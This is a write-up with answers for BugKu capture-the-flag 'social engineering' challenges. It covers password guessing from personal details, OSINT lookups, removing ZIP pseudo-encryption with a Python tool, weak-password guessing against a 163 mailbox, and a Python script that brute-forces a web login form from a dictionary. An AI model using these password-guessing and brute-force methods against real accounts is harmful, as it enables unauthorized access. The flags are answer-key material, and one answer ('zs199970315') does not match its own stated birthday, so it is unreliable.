BugKu Social Engineering



1. Password

Name: Zhang San; birthday: 19970315. KEY format: KEY{XXXXXXXXXX}

Analysis: the initials zs followed by the birthday will do.

Answer: flag{zs199970315}

2. Information search

It is said that bugku.cn can be found on Toutiao. Hint: the flag is the group number. Format: KEY{XXXXXXXXXXX}

Analysis: search Baidu directly.

Answer: KEY{462713425}

3. Simple personal information collection

1.zip

Analysis:

First try brute-forcing the password, then consider ZIP pseudo-encryption. Pseudo-encryption cracking tool:

After the pseudo-encryption is removed, the archive opens.

The social engineering website is down.

Answer: flag{15206164164}
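The pseudo-encryption check mentioned in challenge 3, as an added example that is not part of the original write-up: it reads the "encrypted" flag bit from both the central directory and the local header of every entry, reports entries where the bit is set but the data is not actually encrypted, and clears the bit. The function names, the sample archive and the file name `info.txt` are constructed for this example.

```python
import io, struct, zipfile

ENCRYPTED = 0x0001  # general-purpose flag bit 0: "this entry is encrypted"

def u16(data, off):
    return struct.unpack_from("<H", data, off)[0]

def entries(data):
    """Yield (name, central flag offset, local flag offset, method, csize, usize)."""
    eocd = data.rindex(b"PK\x05\x06")  # end of central directory; ValueError if absent
    count, _cd_size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(count):
        method = u16(data, pos + 10)
        csize, usize, nlen, elen, clen = struct.unpack_from("<IIHHH", data, pos + 20)
        local = struct.unpack_from("<I", data, pos + 42)[0]  # local header offset
        name = data[pos + 46:pos + 46 + nlen].decode("cp437")
        yield name, pos + 8, local + 6, method, csize, usize
        pos += 46 + nlen + elen + clen

def audit(data):
    """Return {entry name: 'plain' | 'pseudo-encrypted' | 'encrypted'}."""
    report = {}
    for name, c_off, l_off, method, csize, usize in entries(data):
        c_enc, l_enc = (u16(data, off) & ENCRYPTED for off in (c_off, l_off))
        if not (c_enc or l_enc):
            report[name] = "plain"
        elif c_enc != l_enc or (method == 0 and csize == usize):
            # Headers disagree, or a stored entry lacks the 12-byte ZipCrypto header.
            report[name] = "pseudo-encrypted"
        else:
            report[name] = "encrypted"
    return report

def clear_flags(data):
    """Return a copy with the encryption bit cleared in both headers of each entry."""
    out = bytearray(data)
    for _name, c_off, l_off, *_rest in entries(data):
        for off in (c_off, l_off):
            struct.pack_into("<H", out, off, u16(out, off) & ~ENCRYPTED)
    return bytes(out)

def make_sample():
    """Constructed sample: a normal archive with only the central-directory bit set."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("info.txt", "constructed sample text\n" * 4)
    data = bytearray(buf.getvalue())
    c_off = next(entries(data))[1]
    struct.pack_into("<H", data, c_off, u16(data, c_off) | ENCRYPTED)
    return bytes(data)
```

A deflated entry with the bit set in both headers is reported as `encrypted`, because the sizes alone cannot tell the two cases apart; only clear the flags on entries that `audit` marks as pseudo-encrypted.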

4. Social engineering, advanced

Problem statement:

Analysis: search Baidu Tieba for "solitary long away".

The mailbox probably uses a weak password. Look up a weak-password list and try the entries one by one against the 163 mail login; the password is a123456.

Answer: KEY{sg1H78Si9C0s99Q}

5. Wang Xiaoming’s diary

Reference link

Analysis:

Note the following information: Bugku online tools

Tool used: Online password attacks

Use the online password attack tool to generate a dictionary:

This produces a dictionary.

Then use a Python script to brute-force the password:

```python
import re
import requests

URL = 'http://120.24.86.145:8002/xiaoming/?yes'
# Message the page shows when the password is wrong
FAIL = 'Password incorrect, please re-enter'


def req(pwd):
    """Submit one candidate password; return the failure-message matches."""
    s = requests.session()
    r = s.get(URL)  # load the page first so the session holds its cookies
    r.encoding = 'utf-8'
    response = s.post(URL, data={'pwd': pwd})
    response.encoding = 'utf-8'
    return re.findall(re.escape(FAIL), response.text)


def zidian():
    """Read the generated dictionary, one candidate per line."""
    with open('mima.txt', 'r', encoding='UTF-8') as f:
        return f.read().splitlines()


for pwd in zidian():
    # No failure message in the response means this candidate was accepted
    if not req(pwd):
        print(pwd)
        break
```


Reference link

```
python3.5 crack.py
WXM
```

Password: WXM

Answer: Flag{bugku-shegong_xMQ}

Reference link 1

6. Simple social engineering attempt

Analysis: findneo.github.io/180406bugku…

References: Reference link 1, Reference link 2, Reference link 3

github.com/bugku
weibo.com/bugku
c.bugku.com/13211.txt

Answer: flag{BUku_open_shgcx1}